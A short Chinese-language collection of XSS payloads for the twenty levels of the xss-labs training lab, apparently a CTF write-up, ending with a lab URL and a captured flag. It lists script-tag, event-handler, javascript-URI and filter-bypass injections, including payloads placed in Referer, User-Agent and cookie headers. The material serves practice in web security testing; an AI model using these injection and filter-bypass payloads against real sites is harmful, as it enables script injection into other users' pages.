1.关于20关的payload合集。
<script>alert(1)</script>
"><script>alert(1)</script>
'onclick='alert(1)
" onclick="alert(1)
"><a href="javascript:alert(1)">
"><a HrEf="javascript:alert(1)">
"><scscriptript>alert(1)</sscriptcript>
javascript:alert(1)
javascript:alert(1)//http://
?t_sort=" type="text" onclick="alert('xss')
" type="text" onmousemove="alert(1) #将payload写到referer里
" type="text" onmousemove="alert(1) #将payload写User-Agent头
" type="text" onmousemove="alert(1) #将payload写cookie头
payload是一张图片马
http://127.0.0.1/xss-labs-master/level15.php?src='level1.php?name=<img src=1 onerror=alert(1)>'
http://127.0.0.1/xss-labs-master/level16.php?keyword=<img%0dsrc=1%0donerror=alert(1)>
http://127.0.0.1/xss-labs-master/level17.php?arg01=a&arg02=aaa onmousemove='alert(1)'
http://127.0.0.1/xss-labs-master/level18.php?arg01=a&arg02=aaa onmousemove='alert(1)'
arg01=version&arg02=<a href="javascript:alert(1)">123</a>
arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(1)10.修改参数
修改
点击
20.如果不想走流程,可直接跳过前往20关获得flag
http://a2f864e8-582b-4d62-a066-a1fd17700dd2.node5.buuoj.cn:81/level20.php
查看源码获得
flag{ad270776-5056-479e-8119-fcf63393d388}
右键查看源码,获得flag{ad270776-5056-479e-8119-fcf63393d388}
